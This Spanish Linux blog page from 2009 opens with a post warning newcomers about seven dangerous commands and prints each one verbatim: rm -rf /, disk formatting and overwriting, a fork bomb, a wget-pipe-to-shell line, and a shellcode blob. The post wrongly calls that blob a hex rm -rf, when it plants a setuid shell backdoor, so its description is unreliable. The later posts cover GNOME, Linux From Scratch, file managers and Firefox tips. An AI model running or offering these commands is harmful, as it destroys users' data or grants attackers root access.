sábado, 10 de enero de 2009

7 comandos peligrosos para Linux



Si eres nuevo en Linux, las oportunidades de que alguién te engañe diciendote que uses algún comando para destruir tu sistema son muy altas, por eso es bueno conocer los comandos más peligrosos para GNU/Linux, en Tech Source from Bohol hay un listado de los 7 comando más mortales para Linux, algunos de estos comandos pueden formatear el disco duro, dañar los archivos, etc.

1. rm -rf /
Este comando borrará de manera recursiva y convincente todos los archivos en el directorio raíz, aquí tienes un video para ver en acción el comando rm -rf /.

2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es la versión hexadecimal de rm-rf / que pueden engañar hasta a los usuarios expertos de Linux.

3. mkfs.ext3 /dev/sda
Este comando formatea la partición que se menciona después de mkfs.

4. :*(){:*|:&};: (sin *)
A este comando se le conoce cómo bomba fork, ejecutar un gran número de procesos hasta que el sistema se congela. Esto puede conducir a la corrupción de datos.

5. any_command > /dev/sda
Este comando provoca perdida total de datos, en la particion que se menciona en el comando

6. wget http://alguna_fuente_no_confiable -O- | sh
Esto descarga paquetes de alguna fuente no confiable y la ejecuta, debes tener mucho cuidado ya que puede ser código malicioso

7. mv /home/tu-carpeta-home/* /dev/null
Este comando va a mover todo el contenido de tu carpeta Home a un directorio que no existe, esto significa que ya nunca volverás a ver tus archivos.

Por ninguna razón vayas a ejecutar estos comando en Linux



fuente:
http://www.nierox.com/2008/11/21/los-7-comandos-mas-peligrosos-de-gnulinux/
--> Leer más...

Cambiar Estilo De Reloj

Cambiarle el aspecto del reloj en GNOME, es muy facil de hacelo amigos.





Esto se puede hacer en cualquier distribucion que utilize Gnome
Pulsa las teclas Alt+F2. Esta combinación de teclas abre el panel para ejecutar una aplicación.
Escribimos gconf-editor y pulsamos en el botón Ejecutar.
Ahora que tenemos abierto el Editor de configuración, en la columna izquierda vamos a apps > panel > applets > clock_screen > prefs.

En el campo custom_format escribimos: %a %d %b %H:%M . En el campo color, escribimos en formato hexadecimal el color que queremos dar a la fecha.

En el campo format escribimos custom.

Cerramos el panel del Editor de configuración (gconf-editor) y veremos los cambios reflejados en nuestro escritorio.



Si queremos volver a dar al reloj su aspecto anterior, basta con volver a abrir el Editor de configuración, dejar en blanco el campo custom_format y escribir 12-hour o 24-hour en el campo format.

Fuente:
http://www.tecnologiaslibres.net/2008/12/13/cambiar-el-aspecto-del-reloj-en-gnome/
--> Leer más...

Construyendo un Linux desde cero

Linux From Scratch - Linux desde cero

Cita :
LFS es un proyecto que provee la documentación y herramientas necesarias para construir paso a paso tu propia distribución de Linux personalizada enteramente desde el código fuente

Informacion extraida de http://casidiablo.net/construir-linux-desde-cero/

Quizás es más sencillo descargar una distribución existente e instalarla, pero existen muchas ventajas en crear un sistema Linux desde cero. Aquí solo algunas de ellas:

* Nos enseña cómo funciona internamente Linux, cómo las aplicaciones trabajan en equipo y cómo dependen una de la otra.
* Te permite personalizar tu sistema a tus gustos y necesidades.
* Construir Linux desde cero produce un sistema bastante compacto y rápido.
* Cuando instalas una distribución normal, tendrás al final un montón de programas y paquetes que probablemente nunca usarás. Sólo estarán allí consumiendo espacio en disco o, lo que es peor, ciclos de procesador. Con un LFS la cosa es totalmente distinta.

Cita Gerard Beekmans:
i. Prefacio

Mis aventuras con Linux empezaron en 1998 cuando descargué e instalé mi primera distribución. Tras trabajar cierto tiempo con ella descubrí algunos aspectos que definitivamente quería ver mejorados. Por ejemplo, no me gustaba la forma en la que estaban organizados los guiones de arranque. Intenté con otras distribuciones para solventar estos detalles, pero todas tenían sus ventajas e inconvenientes. Llegué a darme cuenta de que si quería estar completamente satisfecho con el sistema Linux, tenía que construir el mío propio desde cero.

¿Qué significaba esto? Decidí no utilizar paquetes precompilados de ningún tipo, ni CD-ROMs o discos de arranque que instalasen las utilidades básicas. Quería usar mi sistema Linux actual para desarrollar mi propio sistema personalizado. Este sistema Linux “perfecto” debería tener toda la potencia de los otros sistemas sin sus debilidades. Al principio, la idea fue bastante desalentadora, pero me mantuve aferrado a la idea de que podía construir un sistema que tuviese en consideración mis necesidades y deseos en vez de usar un estándar que no se ajustaba a lo que andaba buscando.

Después de sortear todos los problemas de dependencias circulares y errores de compilación, creé un sistema Linux personalizado hecho a medida y completamente funcional. Este proceso me permitió además crear un sistema compacto y ajustado que era más rápido y ocupaba menos espacio que cualquier sistema operativo tradicional. Llamé a este sistema Linux From Scratch (Linux Desde Cero), o sistema LFS para acortar.

Cuando compartí mis metas y experiencias con otros miembros de la comunidad Linux se hizo palpable que había un amplio interés en las ideas que surgieron de mis aventuras con Linux. No sólo porque dicho sistema LFS de construcción personalizada podía cubrir las especificaciones y requerimientos del usuario, sino también porque ofrecía una gran oportunidad para el aprendizaje a los programadores y administradores de sistemas y ampliar su conocimiento sobre Linux. Con este creciente interés nació el Proyecto Linux From Scratch.

El libro Linux From Scratch otorga a los lectores el conocimento y las instrucciones para diseñar y construir un sistema Linux a medida. Este libro resalta el proyecto Linux From Scratch y los beneficios que conlleva el uso de este sistema. Los usuarios pueden definir todos los aspectos de su sistema, incluida la jerarquía de directorios, los guiones de arranque y la seguridad. El sistema resultante se compilará por completo a partir del código fuente y el usuario podrá especificar dónde, por qué y cómo se instalarán los programas. Este libro permite a sus lectores adaptar por completo sus sistemas Linux según sus propias necesidades y ofrece a los usuarios un mayor control sobre el sistema.

Espero que paséis buenos momentos trabajando en vuestro sistema LFS y que disfrutéis de los numerosos beneficios de tener un sistema que es realmente vuestro.

--
Gerard Beekmans
gerard@linuxfromscratch.org

Recursos
* Página oficial del proyecto http://www.linuxfromscratch.org/index.html
* Documentación importante cuando acabes tu sistema base http://www.linuxfromscratch.org/blfs/
* Además que contamos con documentación en español, así que no hay excusa. http://www.escomposlinux.org/lfs-es/
* LiveCD de LFS con todo para construir tu sistema facilmente. Cuestión de silbar y cantar. http://www.linuxfromscratch.org/livecd/
* Las listas de correos oficiales, donde puedes encontrar ayuda.http://www.linuxfromscratch.org/mail.html

Fuentes:
http://casidiablo.net/construir-linux-desde-cero/
http://linuxfera.net/Tutoriales/construyendo-un-linux-desde-cero/
http://www.escomposlinux.org/lfs-es/
--> Leer más...

14 exploradores de ficheros para Linux

Una de las cosas típicas de GNU/Linux es que para cada tarea dispones de un buen número de alternativas diferentes que se pueden ajustar a los gustos de cada usuario. Puede que tanta diversidad maree al principio (de hecho, existen cientos de distribuciones GNU/Linux distintas, por ejemplo), pero precisamente tener muchas opciones una de las ventajas más claras de Linux sobre otras plataformas.

Esto se extiende a casi todas las clases de aplicaciones disponibles, y los exploradores de ficheros no son una excepción. Los entornos de escritorio más famosos, GNOME y KDE, disponen de sus propios exploradores nativos, pero eso no quita para que los usuarios de estos sistemas o de otros gestores de ventanas prefieran gestionar sus archivos con otras soluciones.

Y precisamente es de lo que hablan en un genial artículo de LinuxLinks en el que desglosan las principales características de cada uno de esos 14 exploradores de ficheros que también describen brevemente (aunque sin ahondar tampoco demasiado). Los protagonistas (con los enlaces a esos pequeños análisis) son los siguientes:

1. Dolphin: el gestor por defecto de KDE 4
2. emelFM2: un explorador de archivos tradicional basado en GTK+ 2
3. Endeavour Mark II: aunque tenga nombre de nave espacial, es otro gestor de ficheros muy completo.
4. GNOME Commander: versión GTK del legendario Midnight Commander.
5. Konqueror: el que fue explorador de archivos en KDE 3.5.x y versiones anteriores se ha convertido en navegador puro y duro en KDE 4, aunque conserva algunas de sus prestaciones.
6. Krusader: un gestor tradicional de ficheros para KDE.
7. Midnight Commander: qué decir de él... toda una leyenda.
8. Nautilus: un gestor de ficheros "espacial", por defecto presente en GNOME.
9. PCMan File Manager: explorador para el entorno ligero LXDE.
10. Rox-Filer: al estilo de Nautilus, muy relacionado tradicionalmente con XFCE.
11. Thunar: más moderno que Rox, y muy indicado también para XFCE, un gestor de ventanas ligero.
12. Worker: explorador que imita visualmente al legendario DirOpus de Amiga (que también está disponible desde hace tiempo para Windows).
13. Xfe: explorador simple y muy parecido al explorador de Windows.
14. 4Pane: un gestor de ficheros que como su propio nombre indica está dividido de serie en 4 paneles distintos.
--> Leer más...

Trucos y secretos del genial Firefox 3.0




Durante años intenté ordenar mis marcadores Web, los bookmarks o favoritos. Por supuesto, no lo logré. Ni siquiera con aquel breve curso de Tarot Revelado que contraté gracias a los siempre atentos servicios del spam. El mail decía "¿atorres deseas conocer tu futuro?" Inocentemente, les respondí: "No, pero me ayudaría mucho ordenar mis bookmarks".

Me mandaron el curso de todas maneras, como era de prever, y con esto conseguí, si no conocer mi futuro, al menos aprender que el Tarot tampoco cambiaba el amasijo de direcciones Web en mi navegador. Todo suma, como quien dice.

No me resigné.

Estaba considerando o bien adquirir otras ofertas, como el aprendizaje holístico del noruego o el Tao de la Mostaza en CD, o bien rendirme ante la evidencia de que los marcadores Web son ingobernables, cuando salió el Firefox 3.0.

Su barra de direcciones busca y rebusca entre nuestros bookmarks hasta dar con una o más coincidencias. Así que con recordar aunque sea una mínima fracción de lo que alguna vez guardamos en esa atropellada colección es suficiente. Si está ahí, Firefox lo encontrará, incluso en subcarpetas.
Satori 3.0

Cuando descubrí esa función, el cielo ?era pleno junio y estaba frío y nublado? se abrió con un trueno y un rayo de luz inundó el lugar donde me encontraba, al tiempo que una emoción beatífica inundaba mi espíritu. ¡Satori! En rigor, no fue para tanto. La parte de la emoción beatífica es una exageración.

Pero mientras afuera se largaba a llover y el UPS me informaba que el rayo había sido de lo más real y había puesto los filtros contra sobrecargas al límite, me di cuenta de que por fin mis cuatrocientos millones de bookmarks me iban a servir para algo.

Con cierto escepticismo, pero a la vez entusiasmado ?palabra que en griego significaba poseído por los dioses; es decir, loco? empecé a probar con páginas que hacía lustros que no visitaba. Murmuraba entre dientes: "Esto es magia... o por lo menos Tarot Develado". Pero no. Tampoco Tao. Ni algo más o menos básico y demodé como búsquedas en el Historial.

Era inteligencia pura puesta al servicio del mayor problema científico de la historia, sólo detrás del Acelerador de Hadrones y el Buscaminas de Windows.

Sin embargo, como acontece a menudo con el entusiasmo, duró poco y dejó tras de sí cierta sensación de fastidio. ¿Qué misterios quedaban ahora por delante? ¿Ya no habría preguntas para responder? ¿Firefox había derribado el interrogante final; esto es, cómo ordenar los bookmarks? Fue un consuelo el que todavía nos quedaran cosas como ¿cuál es el sentido de la vida? o ¿para qué sirve Facebook?
El Método y los métodos

Decidí investigar un poco más, porque me encantan los trucos que aceleran el trabajo cotidiano. No es que me guste ir rápido. En rigor, me disgusta apurarme. Pero esos procedimientos para terminar antes el trabajo me han permitido llegar a casa cuando todavía es de día, últimamente. Fue eso o el nuevo horario de verano, no lo sé.

Hurgando en los atajos de teclado descubrí que además del bien conocido Control+Enter, Firefox trae otros. Control+Enter añade www. y .com a cualquier palabra que escribamos en la barra de direcciones. No hace falta poner wwwpuntolanacionpuntocompuntoar. Con lanacion+Control+Enter alcanza. ¿Y las direcciones .net y .org?

"¡Bueno, no hay tantas!", te decían siempre, cuando preguntabas esto.

En Firefox con Mayúsculas+Enter se añaden www. y .net y con Mayúsculas+Control+Enter se agregan www. y .org. Me encanta la gente que, en lugar de esforzarse por encontrar un pretexto usa ese tiempo en resolver el problema.

Los atajos para navegar por la página son viejos, y no todos resultan igual de útiles. Por ejemplo, la barra espaciadora sirve para bajar una pantalla por vez. Mayúsculas+barra espaciadora sube una pantalla, como era de prever. RePág y AvPág hacen exactamente lo mismo; las prefiero, aunque esto es cuestión de gustos.

Me parece fundamental, en cambio, Alt+flecha a la izquierda, para volver atrás en el historial; es la única forma de salir de esas páginas que algunos pícaros programan para que no acepten nuestros desesperados clics en el botón retroceder del navegador. Con Alt+flecha a la derecha se avanza en el historial.

Por si no los tiene a mano, aquí van otros atajos que, después de más de 13 años de surfear por la Web (¡qué top que sonaba eso cuando fundaron Yahoo!), le garantizo que le cambiarán la vida. OK. Exageré de nuevo. Digamos que le permitirán llevarse menos trabajo a su casa. O más trabajo, depende de cómo aproveche usted las ventajas competitivas.

Control+L: ir a la barra de direcciones

Control+T: nueva pestaña

Control+W: cerrar la pestaña actual o el navegador, a menos que tenga activada la función Mostrar siempre la barra de pestañas. En ese caso, use Alt-F4 para cerrar el navegador

Control+S: salvar la página actual

Control+D: marcar la página actual

Control+Tabulador: circular por las pestañas hacia adelante. Funciona igual que Alt+Tab para las ventanas de Windows, así que Mayúsculas+Control+Tab circula en el sentido contrario, hacia atrás

Control+1 a 9: va a las pestañas 1 a 9, contando de izquierda a derecha
¿Qué me quiere decir?

El atajo que más esperaba no está, sin embargo, entre los mencionados. Hay una nueva función en Firefox que permite añadir motores de búsqueda personalizados; Chrome hace lo mismo, ahora. Suena a que uno va a fundar una especie de nuevo Google. Pero no. Se trata de una caja de texto en la barra de herramientas para buscar en Wikipedia, Amazon, Yahoo!, Live Search y demás. ¿En el Diccionario de la Real Academia Española también?, me pregunté al localizar esta nueva herramienta en un estado de éxtasis que opacaba al de los bookmarks.

Oh, sí, el DRAE viene como herramienta predeterminada en el Firefox en español, aunque no en Ubuntu. Es posible agregarlo, no obstante (ver más abajo).

Puesto que las palabras me gustan más que el chocolate y además me cautiva usar todas las posibles, no solamente las que se oyen por TV, los diccionarios siempre han sido una especie de adicción para mí, desde pequeño. Viene bien que un novelista o un poeta ordenen las palabras de alguna manera entretenida, profunda o bella. Pero para mí hojear un diccionario tiene casi tanto interés como la literatura; las palabras son seres vivientes, de eso nunca tuve duda. Bueno, no me voy a extender sobre esto, porque podría empezar a recibir spam sobre libros y eso sí que no lo toleraría. Imagínese. "¿atorres quieres la obra completa de hbalzac en DVD?"

La cuestión es que ahora podía buscar palabras en el DRAE por medio de Control+K, el atajo que lleva el cursor directo a la caja búsqueda. Quedará seleccionado el último motor que hayamos usado, que en mi caso suele ser este diccionario. Pero a veces queda la Wikipedia, así que no me servía en todos los casos? Problemas, problemas, problemas. ¡Y después me hablan de la crisis!

Pero los muchachos y muchachas de Mozilla no dejan de asombrarme. Se ve que tienen el hábito de pensar. ¡Sería tan bueno infundir esta moda en los colegios! Es una humilde opinión, no quiero pontificar ni nada. Pero hace poco pregunté en un aula cuántos habían leído el Discurso del Método, de rdescartes, ¡y resulta que no lo había leído nadie! No digo que con este libro vaya uno a develar los secretos del Tarot, pero recuerdo que me ayudó mucho a reflexionar y analizar. Ya se sabe, pensar es como cantar. Todos creen que cantan bien. Pero se trata de una actividad que tiene técnicas bastante precisas, y los consejos de rdescartes fueron reveladores.

Por añadidura, en esa aula nadie admitía saber lo que era una Tabla de Verdad. Vaya que tenemos una crisis.

Volvamos. La caja de motores de búsqueda de Firefox se puede personalizar, no sólo para añadir nuevos buscadores ( http://mycroft.mozdev.org/search-engines.html?language=es ) sino también para asignarles palabras clave a los que ya hemos instalado. ¿Acaso podía escribir en la barra de direcciones un simple, modesto y hasta candoroso signo de interrogación seguido de la palabra que quería buscar?

¡Sólo aprender a volar como Neo en The Matrix me hubiera hecho más feliz que esto! ¡Un simple signo de interrogación seguido de la palabra en la barra de direcciones, y voilà, tenía la respuesta del DRAE!

Si no usa Firefox, no desespere. Nadie es perfecto. Y todavía le queda el truco de escribir la dirección de la RAE seguida de la palabra que quiere buscar. Por ejemplo:

http://rae.es/añoranza

Con mi Firefox, en cambio, sólo necesito escribir:

? añoranza

Más cool que el iPhone.

OK, OK, no tanto.
El ratón indómito

¿Todos los atajos del Firefox? Aquí están:
http://support.mozilla.com/es/kb/Keyboard+shortcuts

Pero mi segundo favorito es un atajo de ratón, confieso. Sé que he escrito muchas notas sobre las ventajas de usar el teclado en lugar del mouse. ¡OK, soy culpable, señor juez, condéneme! Pero hacer clic sobre un link con el teclado es como comer helado con cuchillo y tenedor. Lo digo como atenuante, señor juez.

Así que mi segundo atajo favorito es el clic con la ruedita del ratón, que es también un botón, y eso abre ese vínculo en una nueva pestaña. Casi tan bueno como Mayúsculas+Control+T, que restaura las pestañas que hayamos cerrado recientemente. Más atajos de ratón aquí:http://support.mozilla.com/es/kb/Mouse+shortcuts

Podría seguir toda la tarde con estas revelaciones holísticas sobre el Tao del Firefox, pero ya estamos tocando el techo operacional. Así que dejo un link sobre temas interesantes para configurar, personalizar y entender el Firefox:http://support.mozilla.com/tiki-wiki_rankings.php?locale=es-ES&limit=500&categId=1

Escuchar música en Firefox


Si somos de los que escuchan música mientras exploran la Web, entonces valoraremos Foxy Tunes, una aplicación que permite controlar, desde la interfaz de Firefox, cualquier reproductor de música que tengamos instalado. Además, nos ofrece la posibilidad de buscar rápidamente información en Internet sobre la canción, el intérprete o el álbum. Para instalarlo vamos a https://addons.mozilla.org/esES/firefox/addon/219 y pulsamos el botón [Añadir a Firefox]. Presionamos el botón [Instalar], luego de esperar a que termine la cuenta regresiva, y seleccionamos [Reiniciar Firefox]. Abrimos cualquier archivo de música con el Reproductor de Windows Media (u otro programa similar). Cuando volvamos a Firefox, veremos una nueva barra con los controles de audio y el nombre de la canción que estamos escuchando. Presionamos el botón que posee forma de lupa, y podremos hallar datos de la banda en Wikipedia, YouTube, etc..
--> Leer más...

Razones de peso para usar Linux

Hola a tod@s. Quiero haceros saber (si es que alguien todavía no lo sabe) sobre una tecnología llamada Linux. Básicamente, es un sistema operativo, como Windows, bueno, para mi, es mejor . Y en él puedes hace como si estuvieras en windows o más.

Bien, existen multitud de versiones de Linux, ya que es software libre y mucha gente ha cogido la base y lo ha modificado a su gusto, creando asi una nueva versión. Yo uso Ubuntu, buenisima, que ademas tiene variantes como Kubuntu, Xubuntu, Edubuntu, etc. Todas son perfectas y muy estables. Las diferencias entre estos son el tipo de escritorio, el Xubuntu incorpora un escritorio muy simple, mientras que el Kubuntu uno mucho más sofisticado.

Además, ahora han incorporado efectos visuales 3D mucho mejores que los de Windows Vista y que funcionan en un ordenador de hace 5 años, como el mío (algo que no hace el Vista). Un ejemplo:





Como veis es totalmente 3D y los requerimientos son mínimos para hacer funcionar a esta maravilla.

Asi que, desde aquí, os animo a tod@s a probar esta maravilla de creación. Ahora no hace falta ni instalar el sistema, sólo arrancar desde el CD y podrás probar todo el sistema sin cambiar nada en tu ordenador. Y encima, ubuntu nos regala CD y nos lo trae a casa!! gratis !!!

Bueno, por si alguien lo quiere, os paso el link de la página web de ubuntu oficial, dsde ahi pueden accederse a Kubuntu, Xubuntu, etc.

Ubuntu: http://www.ubuntu.com/


10 RAZONES PARA USAR LINUX:

1. Conseguir y mantener actualizado un sistema completo legalmente sin pagar ningún dinero.
2. Poder correr diferentes interfaces gráficas si no te gusta la que viene por defecto o no se adecúa a tus necesidades.
3. Tener control total del hardware del ordenador y saber que no hay puertas secretas traseras en mi software, puestas por compañías de software o gobiernos malintencionados.
4. No hace falta desfragmentar los discos duros, nunca.
5. Probar programas, decidir que no me gustan, desinstalarlos y saber que no he dejado basura en un registro que puede ralentizar el mi máquina.
6. Usar el SO sin necesidad de correr antivirus ni ningún tipo de software anti-espía, y no reiniciar mi ordenador durante meses.
7. Personalizar lo que quiera, legalmente, incluyendo mis programas favoritos. Y puedo preguntar a los desarrolladores, proponerles ideas y participar en el proceso de diseño/programación de software si quiero.
8. Usar el mismo hardware durante más de 5 años hasta que realmente necesites reemplazarlo.
9. Recibir ayuda de cientos de usuarios, expertos y novatos de manera gratuita y desinteresada.
10. Tener un escritorio con efectos espectaculares, y muy superiores a los de Windows Vista, en un ordenador de hace tres años.


Además de estas ventajas, tiene un montón más, descubrelas! (como dije antes, no hace falta ni instalar nada en tu PC si no quieres)
--> Leer más...

..:: Acerca de este blog ::..

Este blog fue diseñado por el Lic. Felipe Aguilera - Lic. en Análisis de Sistemas. Cualquier duda o consulta comunicarse con: msfa001@gmail.com